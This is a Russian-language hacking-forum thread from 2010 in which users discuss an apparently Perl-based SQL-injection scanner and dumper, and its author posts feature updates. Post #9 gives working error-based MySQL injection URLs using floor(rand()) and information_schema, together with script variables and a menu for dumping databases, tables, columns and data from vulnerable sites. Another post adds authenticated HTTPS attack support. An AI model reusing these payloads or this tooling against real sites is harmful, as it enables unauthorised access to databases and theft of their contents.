HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.02.2010, 01:30
ya_mag
Познающий
Регистрация: 18.01.2007
Сообщений: 63
С нами: 10163605

Репутация: 27
По умолчанию

в scaner_error_list.txt я сразу вписал ошибку.... с методом протупил...
 
Ответить с цитированием

  #2  
Старый 15.02.2010, 02:19
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

прошу добавит фунцию типа select ... from ... where table_shema... тоесть не тока с текушего бд но и от остальных
 
Ответить с цитированием

  #3  
Старый 15.02.2010, 02:31
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

в MySQL уже давным-давно добавлено

update:

NAME_CONST - get DB-names from information_schema.schemata
NAME_CONST - get tables from DB-name
NAME_CONST - get column_name from tables from DB-name

Последний раз редактировалось Pashkela; 15.02.2010 в 04:36..
 
Ответить с цитированием

  #4  
Старый 15.02.2010, 13:53
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от Pashkela  
в MySQL уже давным-давно добавлено

update:

NAME_CONST - get DB-names from information_schema.schemata
NAME_CONST - get tables from DB-name
NAME_CONST - get column_name from tables from DB-name
ой сорри я сам не обновился ))
 
Ответить с цитированием

  #5  
Старый 15.02.2010, 13:49
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует...

З.Ы переход на gui всё-таки не планируется?

Последний раз редактировалось daniel_1024; 15.02.2010 в 13:58..
 
Ответить с цитированием

  #6  
Старый 15.02.2010, 15:41
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от daniel_1024  
Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует...

З.Ы переход на gui всё-таки не планируется?
синтаксис такой

ИМЯ_БД.ИМЯ_ТАБЛИЦЫ - и будет дампить откуда надо, если речь про пункт 7

когда спросит Mysql=>5 если уже есть имя БД, то надо выбрать 0 (нет), чтобы не переопределяло имя базы (делается автоматически)

gui не планируется

UPDATE (17.02.2010):

устранение серьезных багов по всему коду, код стал более стабильный и универсальный, перекачать в первом посте

Последний раз редактировалось Pashkela; 17.02.2010 в 19:49..
 
Ответить с цитированием

  #7  
Старый 21.02.2010, 22:18
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

Pashkela, можешь переделать алгоритм сканера сайтов - чтобы он проходил по какому-то несуществующему адресу, тем самым узнавая дефолтную 404 страницу для сканируемого сайта, а затем уже сравнивал с нею всё остальное...тогда и файл с ошибками не нужен будет...
 
Ответить с цитированием

  #8  
Старый 24.02.2010, 02:33
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

update:

Для всех режимов работы - поддержка HTTPS+Authorization

сделано на IO::Socket::SSL

UBUNTU: sudo apt-get install libio-socket-ssl-perl
WIN: install Net::SSLeay and IO::Socket::SSL
+ раскоментировать строчку 48

новые переменные:

$https_mode_auth = 1; # 1 - если нужна авторизация, 0 - нет
$https_auth_script_path = "/login.php"; # путь до скрипта авторизации (начинается со слеша)
$https_auth_post_data = "username=admin&passwd=sex"; # логин, пароль, название полей и etc., взять можно из Tamper Data (FireFox plugin) при авторизации на ресурсе

автоматическое распознавание url, если https и авторегистрация, если есть данные
 
Ответить с цитированием

  #9  
Старый 24.02.2010, 18:48
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

update:

MySql inj floor(rand()):

Названо просто от балды, еще одна альтернатива Blind Mysql injection, но уже для 4.1<=Mysql=>5, т.к. использует стандартные функции для старых версий (можно сказать альтернатива name_const), основано на вызове той же ошибки Duplicate

- Многопоточный
- Post/Get/Cookies/Proxy & etc.
- Все те же возможности, что и при обычной скуле + та же скорость

скуля:
Код:
http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here 
$f_url = "http://example.com/?id=1+or(1,2)="; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "--+"; # close SQL
PS: Приведу еще один пример, некоторые просто не вполне понимают возможности:

скуля:
Код:
http://example.com/?id=(select+1+from+(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)a)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here 
$f_url = "http://example.com/?id=(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+"; # close SQL


[1] floor(rand()) - system information\n";
[2] floor(rand()) - get DB-names from information_schema.schemata\n";
[3] floor(rand()) - get tables from DB-name\n";
[4] floor(rand()) - get column_name from tables from DB-name\n";
[5] floor(rand()) - get tables from information_schema (current DB)\n";
[6] floor(rand()) - get column_name from table (current DB)\n";
[7] floor(rand()) - get data from columns\n";
[8] floor(rand()) - Mysql4 inj brute tables and columns\n";

теперь с blind mysql4 можно работать как с обычной скулей

Обновления в первом посте темы как обычно

PS: + исправление мелких багов

update 28.02.2010 - фикс багов

Последний раз редактировалось Pashkela; 02.03.2010 в 03:01..
 
Ответить с цитированием

  #10  
Старый 05.03.2010, 01:26
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

https - это огромный плюс.
Остальное тоже на уровне.
софтинка то что надо.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Групарик 1.0 - скрипт для массовой рассылки приглашений на группы [В]Контакте HERO Покупка, продажа, услуги в Соц. Сетях 19 31.10.2009 10:26
Продажа от Goldriver'a Goldriver ICQ - Покупка, продажа 3 06.07.2009 20:15
Мобильные браузеры Skyfire 1.0 и Opera Mobile 9.7 jerrri Мировые новости. Обсуждения. 0 10.06.2009 18:29
FreeDOS v 1.0 released spencer Мировые новости. Обсуждения. 12 11.09.2006 20:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.